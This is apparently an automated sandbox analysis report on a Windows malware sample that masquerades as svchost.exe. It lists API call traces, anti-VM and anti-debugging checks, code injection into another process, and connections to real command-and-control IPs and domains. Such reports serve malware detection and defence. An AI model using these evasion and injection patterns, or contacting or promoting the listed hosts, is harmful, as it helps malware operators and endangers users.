    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008EE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,5_2_008EE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008A9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,6_2_008A9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089D120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,6_2_008ADAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_008ADA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,6_2_008ADA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00887680 GetHandleInformation,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,6_2_00887680
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_0089E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,6_2_0089E6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,9_2_02BFDAE8
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BFDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,9_2_02BFDA50
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BED120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BED120
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BF9910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,9_2_02BF9910
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BEE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,9_2_02BEE6B0
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_02BD7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,9_2_02BD7680
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BDE0FB GetLogicalDriveStringsA,GetDriveTypeA,SetErrorMode,free,2_2_02BDE0FB
    Source: C:\Windows\apppatch\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: svchost.exe, 00000002.00000003.1686150606.0000000002955000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AQEMU
    Source: svchost.exe, 00000002.00000002.2645448105.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfs.DLL
    Source: arxtPs1STE.exe, 00000000.00000002.1402513289.0000000000722000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfs
    Source: svchost.exe, 00000002.00000003.1411750098.0000000002912000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2647039093.0000000000826000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2652480302.0000000002923000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000002.00000002.2651549889.000000000290D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
    Source: arxtPs1STE.exe, 00000000.00000002.1402513289.000000000070E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qrogram Files (x86)\Common Files\Oracle\Java\javapath\vmhgfs.DLLz
    Source: C:\Windows\apppatch\svchost.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPortJump to behavior
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401B20 rdtsc 0_2_00401B20
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_008E79D0 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,5_2_008E79D0
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC78A0 CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle,2_2_02BC78A0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_004020E0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,0_2_004020E0
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]0_2_00406800
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00406B60 mov eax, dword ptr fs:[00000030h]0_2_00406B60
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]0_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406800 mov eax, dword ptr fs:[00000030h]2_2_00406800
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov eax, dword ptr fs:[00000030h]2_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_00406B60 mov edx, dword ptr fs:[00000030h]2_2_00406B60
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A01360 mov eax, dword ptr fs:[00000030h]2_2_02A01360
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A01360 mov edx, dword ptr fs:[00000030h]2_2_02A01360
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02A01000 mov eax, dword ptr fs:[00000030h]2_2_02A01000
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00871360 mov eax, dword ptr fs:[00000030h]5_2_00871360
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00871360 mov edx, dword ptr fs:[00000030h]5_2_00871360
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 5_2_00871000 mov eax, dword ptr fs:[00000030h]5_2_00871000
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00821360 mov eax, dword ptr fs:[00000030h]6_2_00821360
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00821360 mov edx, dword ptr fs:[00000030h]6_2_00821360
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 6_2_00821000 mov eax, dword ptr fs:[00000030h]6_2_00821000
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C1360 mov eax, dword ptr fs:[00000030h]9_2_027C1360
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C1360 mov edx, dword ptr fs:[00000030h]9_2_027C1360
    Source: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exeCode function: 9_2_027C1000 mov eax, dword ptr fs:[00000030h]9_2_027C1000
    Source: C:\Users\user\Desktop\arxtPs1STE.exeCode function: 0_2_00401150 CreateFileA,GetFileSizeEx,GetProcessHeap,RtlAllocateHeap,memset,SetFilePointer,LockFile,ReadFile,UnlockFile,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,IsBadWritePtr,0_2_00401150
    Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02BC5720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,RtlAddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02BC5720

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.217.107 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 106.15.232.163 8000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.190.63.136 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: gatyvyz.com
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 72.52.179.174 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 178.162.203.202 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.85.183.50 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 64.225.91.73 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 52.34.198.229 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 75.2.71.199 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.150.10.48 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.191.50.83 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 13.248.169.48 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.212.210 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 76.223.67.189 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 199.59.243.227 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 103.224.182.252 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 91.195.240.19 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 162.255.119.102 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 154.212.231.82 80Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeNetwork Connect: 188.114.96.3 443Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeDomain query: lyvytud.com
    Allocates memory in foreign processes
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 870000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 820000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D70000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E10000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2170000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1220000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A40000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2740000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2890000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1110000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2210000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2860000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F0000 protect: page execute and read and writeJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory allocated: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B50000 protect: page execute and read and writeJump to behavior
